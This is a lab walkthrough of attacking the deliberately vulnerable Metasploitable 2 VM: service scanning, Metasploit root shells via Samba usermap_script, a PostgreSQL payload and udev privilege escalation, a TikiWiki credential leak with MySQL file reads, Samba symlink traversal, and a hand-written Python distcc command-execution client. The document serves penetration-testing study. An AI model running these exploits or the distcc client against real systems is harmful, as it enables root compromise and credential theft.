# Environment setup
After downloading it, drop it into VMware. Bridged networking is enabled by default, so it works as-is.
Credentials: msfadmin / msfadmin
Log in and run ifconfig
to get the IP: 192.168.74.128
Ready to go.
# Service identification
C:\WINDOWS\system32>nmap 192.168.74.128 -sS -T4 -p-
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-02 20:22 China Standard Time
Nmap scan report for 192.168.74.128
Host is up (0.00035s latency).
Not shown: 65522 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
3632/tcp open distccd
5432/tcp open postgresql
8009/tcp open ajp13
8180/tcp open unknown
MAC Address: 00:0C:29:BA:A0:B5 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 6.81 seconds
Port 80 is open. A quick look at the index page shows nothing of interest.
Since 80 is open, I start by poking at it by hand, as practice; on a real engagement I would probably go straight to a full vulnerability scan.
Run dirsearch against it to brute-force paths:
D:\PentestTool\Pentest_ToolBox\Gather_Infomation\dirsearch>dirsearch -u http://192.168.74.128
dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: D:\PentestTool\Pentest_ToolBox\Gather_Infomation\dirsearch\reports\http_192.168.74.128\_24-04-01_20-13-18.txt
Target: http://192.168.74.128/
[20:13:18] Starting:
[20:13:23] 403 - 332B - /.ht_wsr.txt
[20:13:24] 403 - 335B - /.htaccess.bak1
[20:13:24] 403 - 335B - /.htaccess.orig
[20:13:24] 403 - 335B - /.htaccess.save
[20:13:24] 403 - 337B - /.htaccess.sample
[20:13:24] 403 - 336B - /.htaccess_extra
[20:13:24] 403 - 333B - /.htaccessBAK
[20:13:24] 403 - 335B - /.htaccess_orig
[20:13:24] 403 - 334B - /.htaccessOLD2
[20:13:24] 403 - 333B - /.htaccess_sc
[20:13:24] 403 - 333B - /.htaccessOLD
[20:13:24] 403 - 325B - /.htm
[20:13:24] 403 - 331B - /.htpasswds
[20:13:24] 403 - 335B - /.htpasswd_test
[20:13:24] 403 - 332B - /.httr-oauth
[20:13:24] 403 - 326B - /.html
[20:14:12] 403 - 329B - /cgi-bin/
[20:14:26] 403 - 325B - /doc/
[20:14:26] 403 - 329B - /doc/api/
[20:14:27] 403 - 340B - /doc/en/changes.html
[20:14:27] 403 - 340B - /doc/html/index.html
[20:14:27] 403 - 339B - /doc/stable.version
[20:15:16] 200 - 48KB - /phpinfo
[20:15:16] 200 - 48KB - /phpinfo.php
[20:15:37] 403 - 334B - /server-status
[20:15:37] 403 - 335B - /server-status/
[20:15:59] 301 - 357B - /tikiwiki -> http://192.168.74.128/tikiwiki/
Two hits stand out: /phpinfo.php (a full PHP configuration dump, handy for filesystem paths and loaded modules) and a new application under /tikiwiki.
# Exploitation
# tikiwiki RCE
Since this is the Metasploit lab, the moment I saw tikiwiki I went straight to searching for a matching exploit:
msf6 > search tikiwiki
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution
1 exploit/unix/webapp/tikiwiki_upload_exec 2016-07-11 excellent Yes Tiki Wiki Unauthenticated File Upload Vulnerability
2 exploit/unix/webapp/tikiwiki_unserialize_exec 2012-07-04 excellent No Tiki Wiki unserialize() PHP Code Execution
3 auxiliary/admin/tikiwiki/tikidblib 2006-11-01 normal No TikiWiki Information Disclosure
4 exploit/unix/webapp/tikiwiki_jhot_exec 2006-09-02 excellent Yes TikiWiki jhot Remote Command Execution
5 exploit/unix/webapp/tikiwiki_graph_formula_exec 2007-10-10 excellent Yes TikiWiki tiki-graph_formula Remote PHP Code Execution
Interact with a module by name or index. For example info 5, use 5 or use exploit/unix/webapp/tikiwiki_graph_formula_exec
Six modules: four RCEs, one file upload, and one information disclosure. I'll go through them with info one at a time.
Pick an RCE at random and try it.
All five tikiwiki-specific modules fail. Some have no compatible payload; graph_formula should work on paper, but does not, and I don't know why. Could my VM be misconfigured? Unlikely; something to revisit.
Digging around, the module author replied under related issues that the problem is likely bad characters combined with the encoder: the encoder cannot strip the bad characters while preserving the payload's behaviour, so he suggests trying other payloads. Other people's write-ups do show successful exploitation, though. My guess is that I am on the latest Metasploit 6, the encoders were reworked at some point, and some of the old modules were never adapted to that. (Speculation.)
# Samba
Ports 139 and 445 are also open, so check the exact version:
C:\WINDOWS\system32>nmap -sV 192.168.74.128 -p 445
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-02 15:32 China Standard Time
Nmap scan report for 192.168.209.68
Host is up (0.00088s latency).
PORT STATE SERVICE VERSION
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 00:0C:29:BA:A0:B5 (VMware)
Nmap only narrows it down to 3.X - 4.X, which is not precise enough on its own. If the Samba version is in the 3.0.20 to 3.0.25rc3 range, it is vulnerable to CVE-2007-2447: a command injection through the "username map script" option, where smbd passes the SMB username to a shell. (The srvinfo line in the enum4linux output further down reports Samba 3.0.20-Debian, so it is in range.) Try the Metasploit module for it:
msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > use exploit/multi/samba/usermap_script
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.74.128
RHOSTS => 192.168.74.128
msf6 exploit(multi/samba/usermap_script) > run
[*] Started reverse TCP handler on 192.168.2.225:4444
[*] Command shell session 2 opened (192.168.2.225:4444 -> 192.168.74.128:59869) at 2024-04-01 20:58:55 +0800
id
uid=0(root) gid=0(root)
Root shell, straight away. The module's default payload, cmd/unix/reverse_netcat, is a plain reverse shell over nc, which is why the session is a command shell rather than Meterpreter.
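To make the CVE-2007-2447 mechanism concrete, here is a small Python model of the flaw. It is added for this write-up and is not Samba's code or the Metasploit module: echo stands in for the administrator's map script, and build_usermap_payload() reproduces the shape of username that the usermap_script module sends (a shell command substitution in backticks). The real bug was smbd building one command line from the configured script plus the SMB username and handing it to /bin/sh.

```python
import subprocess

# Stand-in for the administrator-configured "username map script".  Samba
# invoked that script with the SMB username appended; on 3.0.20-3.0.25rc3 it
# did so through a shell, so backticks in the name ran as root (CVE-2007-2447).
MAP_SCRIPT = "echo"


def build_usermap_payload(cmd: str) -> str:
    """Username of the shape the Metasploit usermap_script module sends.
    Nothing about the name has to be a real account: the map script runs
    before any lookup."""
    return f"/=`nohup {cmd}`"


def vulnerable_username_map(username: str) -> str:
    """Vulnerable behaviour: the untrusted name is spliced into a single
    command line and handed to /bin/sh, so command substitution fires."""
    completed = subprocess.run(
        f"{MAP_SCRIPT} {username}", shell=True, capture_output=True, text=True
    )
    return completed.stdout.strip()


def hardened_username_map(username: str) -> str:
    """Fixed behaviour: no shell at all.  The name travels as one argv
    element, so backticks, $( ), ; and | are plain characters."""
    completed = subprocess.run(
        [MAP_SCRIPT, username], capture_output=True, text=True
    )
    return completed.stdout.strip()


def is_plausible_username(username: str) -> bool:
    """Second line of defence: an allow-list for any name that will reach an
    external program.  A name that fails this never gets that far."""
    stripped = username.replace("-", "").replace("_", "").replace(".", "")
    return 0 < len(username) <= 64 and stripped.isalnum()


if __name__ == "__main__":
    probe = "/=`echo INJECTED`"          # harmless marker instead of a reverse shell
    print("vulnerable :", vulnerable_username_map(probe))   # /=INJECTED
    print("hardened   :", hardened_username_map(probe))     # /=`echo INJECTED`
    print("allow-list :", is_plausible_username(probe), is_plausible_username("msfadmin"))
```

The vulnerable path prints /=INJECTED because the shell evaluated the backticks; the hardened path prints the name verbatim because there was no shell to evaluate anything. Samba's fix was exactly that split: stop running the map script through a shell, and treat the username as data.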
# tikiwiki database disclosure
The tikiwiki exploits failed because of the version issue, and I did not feel like installing Metasploit v4, so I tried the remaining module, the database disclosure one:
msf6 auxiliary(admin/tikiwiki/tikidblib) > run
[*] Running module against 192.168.209.68
[*] Establishing a connection to the target...
[*] Get information about database...
[*] Install path : /var/www/tikiwiki/lib/tikidblib.php
[*] DB type : mysql
[*] DB name : tikiwiki195
[*] DB host : localhost
[*] DB user : root
[*] DB password : root
[*] Auxiliary module execution completed
That hands over the database account and password. Connect with them directly; as the MySQL root user you can read files off the filesystem with load_file(), which needs the FILE privilege that root has:
mysql -h 192.168.74.128 -u root -p
root
show databases;
use mysql;
show tables;
select User, Password from user;
select load_file('/etc/passwd');
# PostgreSQL exploitation
Port 5432 is open; check the version:
C:\WINDOWS\system32>nmap -sV 192.168.74.128 -p 5432
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-02 16:30 China Standard Time
Nmap scan report for bogon (192.168.74.128)
Host is up (0.00013s latency).
PORT STATE SERVICE VERSION
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
MAC Address: 00:0C:29:BA:A0:B5 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.37 seconds
Search Metasploit for usable modules:
msf6 > search name:postgresql version:8
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/server/capture/postgresql normal No Authentication Capture: PostgreSQL
1 exploit/multi/postgres/postgres_copy_from_program_cmd_exec 2019-03-20 excellent Yes PostgreSQL COPY FROM PROGRAM Command Execution
2 exploit/multi/postgres/postgres_createlang 2016-01-01 good Yes PostgreSQL CREATE LANGUAGE Execution
3 auxiliary/scanner/postgres/postgres_dbname_flag_injection normal No PostgreSQL Database Name Command Line Flag Injection
4 auxiliary/scanner/postgres/postgres_login normal No PostgreSQL Login Utility
5 auxiliary/admin/postgres/postgres_readfile normal No PostgreSQL Server Generic Query
6 auxiliary/admin/postgres/postgres_sql normal No PostgreSQL Server Generic Query
7 auxiliary/scanner/postgres/postgres_version normal No PostgreSQL Version Probe
8 exploit/linux/postgres/postgres_payload 2007-06-05 excellent Yes PostgreSQL for Linux Payload Execution
9 exploit/windows/postgres/postgres_payload 2009-04-10 excellent Yes PostgreSQL for Microsoft Windows Payload Execution
Interact with a module by name or index. For example info 9, use 9 or use exploit/windows/postgres/postgres_payload
Module 8 gives a shell directly. Go:
msf6 exploit(linux/postgres/postgres_payload) > use 8
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
(RHOSTS and LHOST configuration omitted. The module's default credentials, postgres / postgres, are the target's real ones, so nothing else needs setting.)
msf6 exploit(linux/postgres/postgres_payload) > run
[*] Started reverse TCP handler on 192.168.74.1:4444
[*] 192.168.74.128:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
[*] Uploaded as /tmp/ViEXhZas.so, should be cleaned up automatically
[*] Sending stage (1017704 bytes) to 192.168.74.128
[*] Meterpreter session 2 opened (192.168.74.1:4444 -> 192.168.74.128:51664) at 2024-04-02 16:36:20 +0800
meterpreter >
That gives a Meterpreter session. The module logs in as the postgres superuser, writes a shared object into /tmp through PostgreSQL's large-object functions, and loads it with CREATE FUNCTION ... LANGUAGE C; that is what the "Uploaded as /tmp/ViEXhZas.so" line refers to. Check what we are running as:
meterpreter > getuid
Server username: postgres
A low-privileged account (postgres), so on to privilege escalation.
Some research shows this host's udev is affected by Linux udev Netlink Local Privilege Escalation (CVE-2009-1185): udev before 1.4.1 did not verify that netlink uevent messages actually came from the kernel, so any local user can send a forged event that makes udev execute a file as root. This is a bug in udev, not in the kernel itself. Exploit it:
meterpreter > bg
[*] Backgrounding session 2...
msf6 exploit(linux/postgres/postgres_payload) > use exploit/linux/local/udev_netlink
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/local/udev_netlink) > set LHOST 192.168.74.1
LHOST => 192.168.74.1
msf6 exploit(linux/local/udev_netlink) > set SESSION 2
SESSION => 2
msf6 exploit(linux/local/udev_netlink) > run
[*] Started reverse TCP handler on 192.168.74.1:4444
[*] Attempting to autodetect netlink pid...
[*] Meterpreter session, using get_processes to find netlink pid
[*] udev pid: 2994
[+] Found netlink pid: 2993
[*] Writing payload executable (207 bytes) to /tmp/cTXcvwGutp
[*] Writing exploit executable (1879 bytes) to /tmp/DaZonJcalG
[*] chmod'ing and running it...
[*] Sending stage (1017704 bytes) to 192.168.74.128
[*] Meterpreter session 3 opened (192.168.74.1:4444 -> 192.168.74.128:42669) at 2024-04-02 16:40:14 +0800
meterpreter > getuid
Server username: root
Root.
# SMB enumeration and directory traversal
This Samba is also affected by Samba Symlink Directory Traversal. It is a configuration weakness rather than a memory bug: Samba releases before 3.4.6 defaulted to "wide links = yes", and together with "unix extensions = yes" that lets an SMB client with write access to a share create a symlink pointing at / and then browse the entire filesystem through the share. The prerequisite is a writable share, which is the kind of thing enum4linux on Kali turns up. With no options it runs every enumeration it knows over a null session, so the output is long: users, shares, password policy, RID cycling, and so on.
┌──(root㉿kali)-[~/Desktop]
└─# enum4linux 192.168.74.128
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Apr 2 08:07:18 2024
=========================================( Target Information )=========================================
Target ........... 192.168.74.128
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on 192.168.74.128 )===========================
[+] Got domain/workgroup name: WORKGROUP
===============================( Nbtstat Information for 192.168.74.128 )===============================
Looking up status of 192.168.74.128
METASPLOITABLE <00> - B <ACTIVE> Workstation Service
METASPLOITABLE <03> - B <ACTIVE> Messenger Service
METASPLOITABLE <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
==================================( Session Check on 192.168.74.128 )==================================
[+] Server 192.168.74.128 allows sessions using username '', password ''
===============================( Getting domain SID for 192.168.74.128 )===============================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
==================================( OS information on 192.168.74.128 )==================================
[E] Can't get OS info with smbclient
[+] Got OS info for 192.168.74.128 from srvinfo:
METASPLOITABLE Wk Sv PrQ Unx NT SNT metasploitable server (Samba 3.0.20-Debian)
platform_id : 500
os version : 4.9
server type : 0x9a03
======================================( Users on 192.168.74.128 )======================================
index: 0x1 RID: 0x3f2 acb: 0x00000011 Account: games Name: games Desc: (null)
index: 0x2 RID: 0x1f5 acb: 0x00000011 Account: nobody Name: nobody Desc: (null)
index: 0x3 RID: 0x4ba acb: 0x00000011 Account: bind Name: (null) Desc: (null)
index: 0x4 RID: 0x402 acb: 0x00000011 Account: proxy Name: proxy Desc: (null)
index: 0x5 RID: 0x4b4 acb: 0x00000011 Account: syslog Name: (null) Desc: (null)
index: 0x6 RID: 0xbba acb: 0x00000010 Account: user Name: just a user,111,, Desc: (null)
index: 0x7 RID: 0x42a acb: 0x00000011 Account: www-data Name: www-data Desc: (null)
index: 0x8 RID: 0x3e8 acb: 0x00000011 Account: root Name: root Desc: (null)
index: 0x9 RID: 0x3fa acb: 0x00000011 Account: news Name: news Desc: (null)
index: 0xa RID: 0x4c0 acb: 0x00000011 Account: postgres Name: PostgreSQL administrator,,, Desc: (null)
index: 0xb RID: 0x3ec acb: 0x00000011 Account: bin Name: bin Desc: (null)
index: 0xc RID: 0x3f8 acb: 0x00000011 Account: mail Name: mail Desc: (null)
index: 0xd RID: 0x4c6 acb: 0x00000011 Account: distccd Name: (null) Desc: (null)
index: 0xe RID: 0x4ca acb: 0x00000011 Account: proftpd Name: (null) Desc: (null)
index: 0xf RID: 0x4b2 acb: 0x00000011 Account: dhcp Name: (null) Desc: (null)
index: 0x10 RID: 0x3ea acb: 0x00000011 Account: daemon Name: daemon Desc: (null)
index: 0x11 RID: 0x4b8 acb: 0x00000011 Account: sshd Name: (null) Desc: (null)
index: 0x12 RID: 0x3f4 acb: 0x00000011 Account: man Name: man Desc: (null)
index: 0x13 RID: 0x3f6 acb: 0x00000011 Account: lp Name: lp Desc: (null)
index: 0x14 RID: 0x4c2 acb: 0x00000011 Account: mysql Name: MySQL Server,,, Desc: (null)
index: 0x15 RID: 0x43a acb: 0x00000011 Account: gnats Name: Gnats Bug-Reporting System (admin) Desc: (null)
index: 0x16 RID: 0x4b0 acb: 0x00000011 Account: libuuid Name: (null) Desc: (null)
index: 0x17 RID: 0x42c acb: 0x00000011 Account: backup Name: backup Desc: (null)
index: 0x18 RID: 0xbb8 acb: 0x00000010 Account: msfadmin Name: msfadmin,,, Desc: (null)
index: 0x19 RID: 0x4c8 acb: 0x00000011 Account: telnetd Name: (null) Desc: (null)
index: 0x1a RID: 0x3ee acb: 0x00000011 Account: sys Name: sys Desc: (null)
index: 0x1b RID: 0x4b6 acb: 0x00000011 Account: klog Name: (null) Desc: (null)
index: 0x1c RID: 0x4bc acb: 0x00000011 Account: postfix Name: (null) Desc: (null)
index: 0x1d RID: 0xbbc acb: 0x00000011 Account: service Name: ,,, Desc: (null)
index: 0x1e RID: 0x434 acb: 0x00000011 Account: list Name: Mailing List Manager Desc: (null)
index: 0x1f RID: 0x436 acb: 0x00000011 Account: irc Name: ircd Desc: (null)
index: 0x20 RID: 0x4be acb: 0x00000011 Account: ftp Name: (null) Desc: (null)
index: 0x21 RID: 0x4c4 acb: 0x00000011 Account: tomcat55 Name: (null) Desc: (null)
index: 0x22 RID: 0x3f0 acb: 0x00000011 Account: sync Name: sync Desc: (null)
index: 0x23 RID: 0x3fc acb: 0x00000011 Account: uucp Name: uucp Desc: (null)
user:[games] rid:[0x3f2]
user:[nobody] rid:[0x1f5]
user:[bind] rid:[0x4ba]
user:[proxy] rid:[0x402]
user:[syslog] rid:[0x4b4]
user:[user] rid:[0xbba]
user:[www-data] rid:[0x42a]
user:[root] rid:[0x3e8]
user:[news] rid:[0x3fa]
user:[postgres] rid:[0x4c0]
user:[bin] rid:[0x3ec]
user:[mail] rid:[0x3f8]
user:[distccd] rid:[0x4c6]
user:[proftpd] rid:[0x4ca]
user:[dhcp] rid:[0x4b2]
user:[daemon] rid:[0x3ea]
user:[sshd] rid:[0x4b8]
user:[man] rid:[0x3f4]
user:[lp] rid:[0x3f6]
user:[mysql] rid:[0x4c2]
user:[gnats] rid:[0x43a]
user:[libuuid] rid:[0x4b0]
user:[backup] rid:[0x42c]
user:[msfadmin] rid:[0xbb8]
user:[telnetd] rid:[0x4c8]
user:[sys] rid:[0x3ee]
user:[klog] rid:[0x4b6]
user:[postfix] rid:[0x4bc]
user:[service] rid:[0xbbc]
user:[list] rid:[0x434]
user:[irc] rid:[0x436]
user:[ftp] rid:[0x4be]
user:[tomcat55] rid:[0x4c4]
user:[sync] rid:[0x3f0]
user:[uucp] rid:[0x3fc]
================================( Share Enumeration on 192.168.74.128 )================================
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP METASPLOITABLE
[+] Attempting to map shares on 192.168.74.128
//192.168.74.128/print$ Mapping: DENIED Listing: N/A Writing: N/A
//192.168.74.128/tmp Mapping: OK Listing: OK Writing: N/A
//192.168.74.128/opt Mapping: DENIED Listing: N/A Writing: N/A
[E] Can't understand response:
NT_STATUS_NETWORK_ACCESS_DENIED listing \*
//192.168.74.128/IPC$ Mapping: N/A Listing: N/A Writing: N/A
//192.168.74.128/ADMIN$ Mapping: DENIED Listing: N/A Writing: N/A
===========================( Password Policy Information for 192.168.74.128 )===========================
[+] Attaching to 192.168.74.128 using a NULL share
[+] Trying protocol 139/SMB...
[+] Found domain(s):
[+] METASPLOITABLE
[+] Builtin
[+] Password Info for Domain: METASPLOITABLE
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: Not Set
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 0
======================================( Groups on 192.168.74.128 )======================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
=================( Users on 192.168.74.128 via RID cycling (RIDS: 500-550,1000-1050) )=================
[I] Found new SID:
S-1-5-21-1042354039-2475377354-766472396
[+] Enumerating users using SID S-1-5-21-1042354039-2475377354-766472396 and logon username '', password ''
S-1-5-21-1042354039-2475377354-766472396-500 METASPLOITABLE\Administrator (Local User)
S-1-5-21-1042354039-2475377354-766472396-501 METASPLOITABLE\nobody (Local User)
S-1-5-21-1042354039-2475377354-766472396-512 METASPLOITABLE\Domain Admins (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-513 METASPLOITABLE\Domain Users (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-514 METASPLOITABLE\Domain Guests (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1000 METASPLOITABLE\root (Local User)
S-1-5-21-1042354039-2475377354-766472396-1001 METASPLOITABLE\root (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1002 METASPLOITABLE\daemon (Local User)
S-1-5-21-1042354039-2475377354-766472396-1003 METASPLOITABLE\daemon (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1004 METASPLOITABLE\bin (Local User)
S-1-5-21-1042354039-2475377354-766472396-1005 METASPLOITABLE\bin (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1006 METASPLOITABLE\sys (Local User)
S-1-5-21-1042354039-2475377354-766472396-1007 METASPLOITABLE\sys (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1008 METASPLOITABLE\sync (Local User)
S-1-5-21-1042354039-2475377354-766472396-1009 METASPLOITABLE\adm (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1010 METASPLOITABLE\games (Local User)
S-1-5-21-1042354039-2475377354-766472396-1011 METASPLOITABLE\tty (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1012 METASPLOITABLE\man (Local User)
S-1-5-21-1042354039-2475377354-766472396-1013 METASPLOITABLE\disk (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1014 METASPLOITABLE\lp (Local User)
S-1-5-21-1042354039-2475377354-766472396-1015 METASPLOITABLE\lp (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1016 METASPLOITABLE\mail (Local User)
S-1-5-21-1042354039-2475377354-766472396-1017 METASPLOITABLE\mail (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1018 METASPLOITABLE\news (Local User)
S-1-5-21-1042354039-2475377354-766472396-1019 METASPLOITABLE\news (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1020 METASPLOITABLE\uucp (Local User)
S-1-5-21-1042354039-2475377354-766472396-1021 METASPLOITABLE\uucp (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1025 METASPLOITABLE\man (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1026 METASPLOITABLE\proxy (Local User)
S-1-5-21-1042354039-2475377354-766472396-1027 METASPLOITABLE\proxy (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1031 METASPLOITABLE\kmem (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1041 METASPLOITABLE\dialout (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1043 METASPLOITABLE\fax (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1045 METASPLOITABLE\voice (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1049 METASPLOITABLE\cdrom (Domain Group)
==============================( Getting printer info for 192.168.74.128 )==============================
No printers returned.
enum4linux complete on Tue Apr 2 08:07:28 2024
Metasploit has a module for the traversal itself:
msf6 > search samba_symlink
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/samba_symlink_traversal normal No Samba Symlink Directory Traversal
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/admin/smb/samba_symlink_traversal
msf6 > use 0
msf6 auxiliary(admin/smb/samba_symlink_traversal) > set RHOSTS 192.168.74.128
RHOSTS => 192.168.74.128
msf6 auxiliary(admin/smb/samba_symlink_traversal) > set SMBSHARE tmp
SMBSHARE => tmp
msf6 auxiliary(admin/smb/samba_symlink_traversal) > run
[*] Running module against 192.168.74.128
[*] 192.168.74.128:445 - Connecting to the server...
[*] 192.168.74.128:445 - Trying to mount writeable share 'tmp'...
[*] 192.168.74.128:445 - Trying to link 'rootfs' to the root filesystem...
[*] 192.168.74.128:445 - Now access the following share to browse the root filesystem:
[*] 192.168.74.128:445 - \\192.168.74.128\tmp\rootfs\
[*] Auxiliary module execution completed
From here, connecting to the tmp share and entering rootfs is the same as browsing /, so any world-readable file can be pulled: /etc/passwd, the tikiwiki configuration, and so on. Two caveats: the rootfs symlink stays behind in /tmp on the target until someone removes it, and the share is accessed as a guest, so writes are limited to what the guest account can write and planting an SSH key in /root/.ssh will not work from here; for that, use the root shell from usermap_script.
# distcc command execution
Port 3632 is distcc; check the exact version:
C:\WINDOWS\system32>nmap -p 3632 -sV 192.168.74.128
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-02 20:24 China Standard Time
Nmap scan report for 192.168.74.128
Host is up (0.00s latency).
PORT STATE SERVICE VERSION
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
MAC Address: 00:0C:29:BA:A0:B5 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.06 seconds
Look for the exploit module:
msf6 auxiliary(admin/smb/samba_symlink_traversal) > search name:distcc
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/misc/distcc_exec 2002-02-01 excellent Yes DistCC Daemon Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/misc/distcc_exec
Use it and run it, but the attack fails:
msf6 exploit(unix/misc/distcc_exec) > run
[*] Started reverse TCP handler on 192.168.74.1:7777
[-] 192.168.74.128:3632 - Exploit failed: Errno::ECONNRESET An existing connection was forcibly closed by the remote host.
[*] Exploit completed, but no session was created.
I searched for this for ages without finding a reliable answer. If you know, ping me.
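A practitioner's way to separate "the module is broken" from "the service is unreachable or refusing me" is to speak the protocol by hand. The Python client below is added here as an illustration; it is not the Metasploit module, although it builds the same request shape (version-1 distcc tokens with the argv trick sh -c cmd # -c main.c -o main.o, which keeps distccd's argument scanner happy while sh treats the rest as a comment). SAMPLE_REPLY is a constructed answer for offline testing, not something captured from the target.

```python
import socket

# distcc wire protocol, version 1: every token is a 4-byte name followed by an
# 8-digit hex value.  For ARGV, DOTI, SOUT, SERR and DOTO the value is the
# length of the data that follows.  distccd never authenticates and runs
# whatever the client names as its compiler, hence argv[0] = "sh".


def token(name: str, payload) -> bytes:
    """Encode one token: an int value, or a bytes body prefixed by its length."""
    if isinstance(payload, int):
        return name.encode() + f"{payload:08x}".encode()
    return name.encode() + f"{len(payload):08x}".encode() + payload


def build_request(cmd: str) -> bytes:
    """Request that makes distccd run `sh -c cmd`; the trailing arguments are
    there only to look like a real compile job."""
    argv = ["sh", "-c", cmd, "#", "-c", "main.c", "-o", "main.o"]
    req = token("DIST", 1) + token("ARGC", len(argv))
    for arg in argv:
        req += token("ARGV", arg.encode())
    req += token("DOTI", b"A")  # the "preprocessed source" distccd expects; one byte will do
    return req


def parse_response(data: bytes) -> dict:
    """Walk DONE/STAT/SERR/SOUT/DOTO tokens; ints for values, bytes for bodies."""
    out, pos = {}, 0
    body_tokens = {"SERR", "SOUT", "DOTO"}
    while pos + 12 <= len(data):
        name = data[pos:pos + 4].decode("ascii")
        value = int(data[pos + 4:pos + 12], 16)
        pos += 12
        if name in body_tokens:
            out[name] = data[pos:pos + value]
            pos += value
        else:
            out[name] = value
    return out


def run_command(host: str, port: int, cmd: str, timeout: float = 10.0) -> dict:
    """Send the request, read until distccd closes, return the parsed tokens.
    Network call: not exercised offline."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_request(cmd))
        chunks = []
        while True:
            chunk = sock.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return parse_response(b"".join(chunks))


# Constructed sample of what a vulnerable distccd answers for cmd="id"
# (made up for this example, not captured from 192.168.74.128):
SAMPLE_REPLY = (
    token("DONE", 1) + token("STAT", 0) + token("SERR", b"")
    + token("SOUT", b"uid=1(daemon) gid=1(daemon)\n") + token("DOTO", b"")
)

if __name__ == "__main__":
    print(parse_response(SAMPLE_REPLY))
    # For the real thing: run_command("192.168.74.128", 3632, "id")["SOUT"]
```

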